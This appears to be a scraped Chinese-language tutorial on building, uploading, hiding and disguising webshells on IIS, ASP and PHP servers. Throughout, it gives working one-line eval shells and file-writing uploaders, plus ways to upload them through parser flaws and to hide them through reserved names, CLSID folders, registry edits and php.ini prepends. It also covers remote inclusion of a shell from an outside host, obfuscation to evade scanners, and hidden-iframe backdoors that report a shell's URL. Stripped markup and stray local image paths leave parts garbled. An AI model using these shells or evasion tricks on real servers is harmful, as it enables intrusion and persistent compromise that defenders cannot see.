Maison >développement back-end >tutoriel php >Webshell实现与隐藏探究
一、什么是webshell
webshell,顾名思义:web指的是在web服务器上,而shell是用脚本语言编写的脚本程序,webshell就是就是web的一个管理 工具,可以对web服务器进行操作的权限,也叫webadmin。webshell一般是被网站管理员用于网站管理、服务器管理等等一些用途,但是由于 webshell的功能比较强大,可以上传下载文件,查看数据库,甚至可以调用一些服务器上系统的相关命令(比如创建用户,修改删除文件之类的),通常被 黑客利用,黑客通过一些上传方式,将自己编写的webshell上传到web服务器的页面的目录下,然后通过页面访问的形式进行入侵,或者通过插入一句话 连接本地的一些相关工具直接对服务器进行入侵操作。
Default
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
|
form action=http://主机路径/TEXT.asp method=post> textarea name=value cols=120rows=10width=45> set lP=server.createObject("Adodb.Stream")//建立流对象 lP.Open//打开 lP.Type=2//以文本方式 lP.CharSet="gb2312"//字体标准 lP.writetext request("newvalue") lP.SaveToFile server.mappath("newmm.asp"),2//将木马内容以覆盖文件的方式写入newmm.asp,2就是已覆 盖的方式 lP.Close//关闭对象 set lP=nothing//释放对象 response.redirect"newmm.asp"//转向newmm.asp /textarea> textarea name=newvalue cols=120rows=10width=45>(添入生成木马的内容) /textarea> BR> center> br> input type=submit value=提交> |
大马的工作模式简单的多,他没有客户端与服务端的区别,就是一些脚本大牛直接把一句话木马的服务端整合到了一起,通过上传漏洞将大马上传,然后复制 该大马的url地址直接访问,在页面上执行对web服务器的渗透工作。但是有些网站对上传文件做了严格的限制,因为大马的功能较多,所以体积相对较大,很 有可能超出了网站上传限制,但是小马的体积可以控制(比如把代码复制很多遍,或者在一个乱码文件中夹入代码),但是小马操作起来比较繁琐,可以先上传小马 拿到webshell,然后通过小马的连接上传大马拿到服务器。
二、如何上传webshell
1.解析漏洞上传
(1)iis目录解析漏洞
比如:xx.asp;.jpg。在网页上传的时候识别的是jpg文件,但是上传之后iis不会解析;之后的字符,同样会把该文件解析成asp文件,这个漏洞存在于iis5.x/6.0版本。
在web服务器开启fast-CGI的时候,上传图片xx.jpg。内容为:
Default
1
|
fputs(fopen('shell.php','w'),'eval($_POST[shell])?>');?> |
这里使用的fput创建一个shell.php文件,并写入一句话。访问路径xx.jpg/.php,就会在该路径下生成一个一句话木马 shell.php。这个漏洞在IIS 7.0/7.5,Nginx 8.03以下版本存在。语言环境:PHP,prel,Bourne Shell,C等语言。
2.截断上传
3.后台数据库备份
4.利用数据库语句上传
(1) mysql数据库into outfile
三、webshell的“安全”
1.关于webshell的隐藏
(1)大马的隐藏
windows系统存在系统保留文件夹名,windows不允许用这些名字来命名文件夹保留文件 夹:aux|prn|con|nul|com1|com2|com3|com4|com5|com6|com7|com8|com9|lpt1|lpt2|lpt3|lpt4|lpt5|lpt6|lpt7|lpt8|lpt。 但是这些可以使用windows的copy命令创建,比如:
Default
1
|
c:\>copy3.asp\\.\C:\aux.asp |
file:///C:\Users\SAKAIY~1\AppData\Local\Temp\msohtmlclip11\clip_image020.png
file:///C:\Users\SAKAIY~1\AppData\Local\Temp\msohtmlclip11\clip_image022.jpg在c盘中创建一个aux.asp。这个文件无法在图像界面下删除。file:///C:\Users\SAKAIY~1\AppData\Local\Temp\msohtmlclip11\clip_image023.png要删除必须使用del命令。file:///C:\Users\SAKAIY~1\AppData\Local\Temp\msohtmlclip11\clip_image024.png删除了之后是没有提示的,但是文件确实没有了。当然用这样的方法虽然可以创建一个图形界面无法删除的webshell,但是如果直接放在网页根目录下,被有经验的网管看到还是回删除的。②clsid隐藏
windows每一个程序都有一个clsid,如果将一个文件夹命名为x.{程序clsid},然后输入一下两条命令:file:///C:\Users\SAKAIY~1\AppData\Local\Temp\msohtmlclip11\clip_image026.jpg创建后file:///C:\Users\SAKAIY~1\AppData\Local\Temp\msohtmlclip11\clip_image027.png点开进入的是控制面板,但是其实该文件还是文件夹,里面还存在大马,而且创建一个这样一个带有clsid的文件夹将其命名为相应的程序可以迷惑网络 管理员的实现,比如进入回收站文件夹中创建这样一个带有回收站clsid的文件夹,在里面里面再copy一个保留字asp,还可以使用
Default
1attrib+h+s+r+d/s/d
修改该文件的属性,将其隐藏,一般windows都是默认不显示隐藏文件的,而且回收站文件夹是自动创建的,这样可以达到隐藏一个不死webshell到服务器中去。
③驱动隐藏技术
原理是在于,在windows文件系统中,打开文件夹的时候系统会发送一个 IRP_MJ_DIRECTORY_CONTROL函数,这个函数可以分配一个缓冲区,将该文件夹下的子文件夹遍历处理得到的信息存放至缓冲区,在遍历的 时候,寻找匹配的文件名,如果文件名匹配,就绕过当前文件夹或者文件,对于绕过的原理,我查询了下代码,根据我的理解,它是根据将遍历的指针在查询到目标 文件的时候,加上该文件的偏移量,不扫描目标文件夹,直接跳过。对于这种技术的实施,虽然网上很多C的源码,但是操作起来有一定的困难,因为头文件的支持,还有系统的支持(不同系统的文件系统会不同),在网上查找到了Easy File Locker程序,需要将其安装至web服务器上,对目标文件设置权限。Default
1file:///C:\Users\SAKAIY~1\AppData\Local\Temp\msohtmlclip11\clip_image028.png
权限的设置有可读accessable,可写writable,可删deletable,可见visible。Default
1file:///C:\Users\SAKAIY~1\AppData\Local\Temp\msohtmlclip11\clip_image030.jpg
上图可以看到我们将其隐藏了,如前文所说,因为直接绕过了遍历,那么访问绝对路径却可以访问。我的理解是:Default
1234c:\WINDOWS\xlkfs.dat
c:\WINDOWS\xlkfs.dll
c:\WINDOWS\xlkfs.ini
c:\WINDOWS\system32\drivers\xlkfs.sys
这4个文件代替了遍历查询,要访问隐藏后的文件,输入绝对路径并不是应用绝对路径查询,而是通过上面4个文件进行的查询,相当于给隐藏文件做了一个单独的驱动。为了不被管理员发现,可以将Easy FileLocker的程序删除,但是不能删除上述4个文件。删除程序后,输入绝对路径还是可以访问,就达到了隐藏后门的作用④注册表隐藏
注册表路径:HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL在这个路径下有一个CheckedValue的键值,把他修改为0,如果没有CheckValue这个key直接创建一个,将他赋值为0,然后创建的隐藏文件就彻底隐藏了,即时在文件夹选项下把“显示所有文件”也不能显示了。(2)一句话木马的隐藏
①头文件包含隐藏
在web里面的一些脚本文件中,有些文件里面有包含语句,可以利用这种包含方法包含一句话文件,在访问这个页面会直接调用这些一句话。asp包含语句:,直接填入路径,文件路径是web服务器上的路径。可以使用站长住手将一句话的NTFS流小马写入图片里面,将路径的‘\’改‘:’写入之后图片是显示不了的,然后找 到web服务器上的一个asp文件,在文件的开始部分写上include语句,php包含语句:
Default
1include($include);?>
这里的$include可以是外部路径比如:
http://www.aaa.com/1.php?Include=http://www.bbb.com/hehe.php这个aaa上的1.php内容为
Default
1include($include);?>
,表示包含。bbb是外部服务器的,前提是这个服务器不能支持PHP。否则将会在bbb这个服务器上执行hehe.php(即一句话马),而aaa不执行。
②配置文件隐藏一句话(PHP)
在拿到PHP的webshell之后,可以利用php.ini隐藏文件,编辑配置文件,其中一个项功能是将某一个文件的内容添加到任意界面的页眉页脚:auto_prepend_file =hehe.php然后看include_path = “E:\PHPnow-1.5.6\htdocs;”这个配置信息表示加载页眉页脚的文集位置,path规则是”\path1;\path2″,表示将path1路径的 文件夹下的页眉页脚文件添加到path中的文件中去,因为这里是一个‘.’表示根路径,这里就相当于添加到了主页上面去了,然后hehe.asp文件里面 写上一句话,就可以通过php添加页眉的共能,将一句话写入网站首页。③404小马
404小马在访问的时候显示出来一个404页面不存在的页面,但是实际上木马代码已经执行,一般都是按5次shift可以将它调用出来。四、关于webshell的免杀一句话免杀
1.构造法绕过检测(PHP)
一般的检测程序会过滤这样”_POST”,”system”,”call_user_func_array”这样的 字符,这个时候可以用构造法绕过一些检测程序,基本原理是,php每一个字符都都对应了一个二进制的值,可以采用异或的方式,让马中的一个字符用两个字符 异或后的值来代替。比如像一下代码Default
12345678
@$_++; // 这里++让’_’自加1
$__=("#"^"|"); // _
$__=("."^"~"); // P
$__=("/"^"`"); // O
$__=("|"^"/"); // S
$__=("{"^"/"); // T
?>
然后构造与一句话可以写为
Default
123@$_++;
$__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/"); // $__的值为_POST
@${$__}[!$_](${$__}[$_]);?>
// 结果为@$_POST[0]($POST[1])!$_表示1的相反,在语言里面1代表真,反过来就是0(假)但是这样的绕过方法相当弱,仔细想一下,就算是两个字符的二进制值异或,但是我们要用某个字符,还是应用那个字符的值,比如
Default
1$__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/")
的二进制值与_POST字符的值一样的,要是检测程序会检测二进制码的值,还是会被杀掉。
2.正则表达式代替法(PHP)
php中有一个函数preg_replace()函数,这个函数可以实现正则表达式的替换工作。用替换绕过检测系统还需要php脚本语言里面的一个函数特性,函数在调用的时候,如果函数里面的形参赋的值里面含有命令,就会执行这个命令。Default
1234
functionfunfunc($str){}
echopreg_replace("/
(.+?)/ies",'funfunc("\1")',$_POST["cmd"]); ?>
上述代码就是替代的一个过程,首先创建一个空函数,然后使用preg_replace函数替换表单cmd中的(这里是html里面表示主题)为funfunc,将post表单中的值写成 {${phpinfo()}} (当然这里的phpinfo()可以换成其他的命令),通过置换,就会变成funfunc({${phpinfo()}})由于${}可以解析{}中的内容,所以这里的phpinfo就可以顺利执行了。3.即时生成法(PHP)
在使用头文件包含的时候,所包含头文件php很容易被扫描器扫描到,这时候可以使用file_put_content创建一个文件,里面写如php的一句话马。在访问之前先生成马,但是这个函数比较敏感,很容易被杀。4.回避法(asp)
因为有的asp服务器为了防止一句话马,会过滤,可以使用:Default
1scriptlanguage=VBScriptrunat=server>execute request("cmd")/Script>
功能相同,就是换个形式。回避特定脚本语言:aspx一句话Default
1<script>language<span>=<span>"C#"<span><span>runat<span>=<span>"server"<span>><span>WebAdmin2Y<span>.<span>x<span>.<span>y<span><span>aaaaa<span><span>=<span><span>new<span><span>WebAdmin2Y<span>.<span>x<span>.<span>y<span>(<span>"add6bb58e139be10"<span>)<span>;<span></script>
这里使用C#语言写一句话马。5.拆分法(asp)
将拆分为,虽然绕过的可能性很小,但是也是一种绕过手法,也许有的服务器,做了很多高大上的扫描方式,但是遗漏小的问题。还有拆分法加强版:Default
12IfRequest("MH")""ThenExecute(Request("MH"))%>
ifrequest("MH")""thensession("MH")=request("MH"):endif:ifsession("MH")""thenexecutesession("MH")%>
以上两句使用了if一句将其分开,中心思想将敏感字符拆分,因为一般asp特征码为eval(request或者execute(request,拆分了之后检测不到特征码,就直接绕过了。6.乱码变形(ANSI->Unicode加密)
Default
1evalrequest("#")%>变形为“┼攠數畣整爠煥敵瑳∨∣┩愾”
Default
1eval(eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("brute"))%>
上面一行代码是采用了ascii加密的方法,chr(114)代表的是ascii中的编号为114个那个字符,即r。上述代码转换后的代码为Default
1eval(eval(request("brute"))%>
7.大马免杀
(1)base4code编码
大马的免杀可以通过将大马的代码进行压缩,压缩之后在进行base4的加密算法,然后在大马的末尾添加
Default
1@eval(gzinflate(base64_decode($code)));
就可以执行脚本了。其中,$code变量是用来存放base4的code码,执行的时候先gzinflate解压,在eval执行。其实这种不能真正意义上的免杀,以为base4code和eval还是回被列入特征码行列,在过扫描器的时候同样会被杀掉。(2)ROT13编码(php)
str_rot13是php用来编码的一个函数。可以利用它来编码脚本代码来绕过特征码的检测,比如。file:///C:\Users\SAKAIY~1\AppData\Local\Temp\msohtmlclip11\clip_image031.png图中的strrev函数是用来反转字符,为了逃过特征码的检测,还特地将字符用’.’号隔开。图中3个str_rot13所加密的字符依次是 gzinflate,str_rot13,base64_decode,相当于三重加密,而且也回避了gzinflate,base64_decode这 两个特征码。但是没有回避str_rot13。有可能有的杀软会将str_rot13也作为特征码。ROT13成为回转13,就是讲当前字符在字母表中的位置值减去13对应的字符加密。加密两次就回到原来的值了。但是由于算法固定,加密的强度也不强。而且破解的方式极为简单,只要再加密一边就可以了。(3)其他编码
一般杀软和扫描器都会用特征码来判断是否有病毒,在对大马或者小马,一句话马做免杀处理的时候,一般都会用php或 者asp脚本中加密类的函数来加密绕过扫描器(比如base4,rot13等),但是我觉得可以自己编写加密算法,然后使用自己编写的加密算法加密脚本代 码就可以绕过一些特征码的。可以使用一些凯撒密码,移位加密等加密手段的思想,写一段加密算法,然后将脚本代码进行加密,然后base4,rot3这样的 特征码就会消失,或者可以不那么麻烦,直接用自制的加密算法加密特征码,然后再使用的时候将其解密就行了。还可以使用DES,RSA这样的密钥加密算法也可以,一般的大马都会有一个密码的登陆框,可以讲登陆脚本的密码跟解密密钥联动起来,输入正确的密码后才能够解析,一方面是为了逃过扫描器与杀软的查杀,另一方便,这个大马即使被别人拿到了,也无法解密,看到其中的源码。五、关于webshell的后门
一般网上下载的大马或多或少的都会有后门,这些后门直接导致了我们拿的网站被别人顺带拿走了,所以在网上下载的大马必须先检查有没有后门。比如这里的万能密码:Default
1234567endfunction
ifsession("hehe")userpassthen
ifrequest.form("pass")""then
ifrequest.form("pass")=userpassor request.form("pass")="1111111"Then
session("hehe")=userpasss
response.redirect url
else
这里
Default
1request.form("pass")=userpass
原本是为了将pass的值进行验证,如果输入的pass值等于userpass的情况,就代表验证成功,但是后面
Default
1orrequest.from(“pass”)=”1111111”
表示如果输入的pass值为1111111,也可以登录大马。当然,这个地方不可能会这么简单,原作者完全可以把userpass赋值成为两个,添加一个 userpass改变的触发条件,在他登录的时候触发这个条件(比如说如果登录失败的时候将触发userpass值的更新),这样就可以添加一个后面,而 且触发条件的代码与验证代码分隔的较远,也不好查找,这个时候就需要我们把大马的代码逐行分析。然后再用框架挂马:
Default
1iframe src=后门地址width=0height=0>/iframe>
这个地方将链接的地址宽度和高度全设置为0,就该页面就隐藏了。里面的“后门地址”指向自己的脚本收信器,最后将收信脚本放到自己搭建的一个公网服务器上面,收信脚本如下:
Default
12345678url=Request.ServerVariables("HTTP_Referer")
setfs=server.CreateObject("Scripting.FileSystemObject")
setfile=fs.OpenTextFile(server.MapPath("hehe.txt"),8,True)
file.writelineurl
file.close
setfile=nothing
setfs=nothing
%>
其中
Default
1url=Request.ServerVariables("HTTP_Referer")
表示请求的字符转内容,即大马的url地址,然后把url地址保存到当前目录的hehe.txt。
要提出这种后门首先必须先要破坏大马第二种密码验证,即万能密码。删除相关的功能代码,然后再查找有没有asp大马页面有没有例如width=0 height=0这样的隐藏url,查找出来将其删除。以上就介绍了Webshell实现与隐藏探究,包括了方面的内容,希望对PHP教程有兴趣的朋友有所帮助。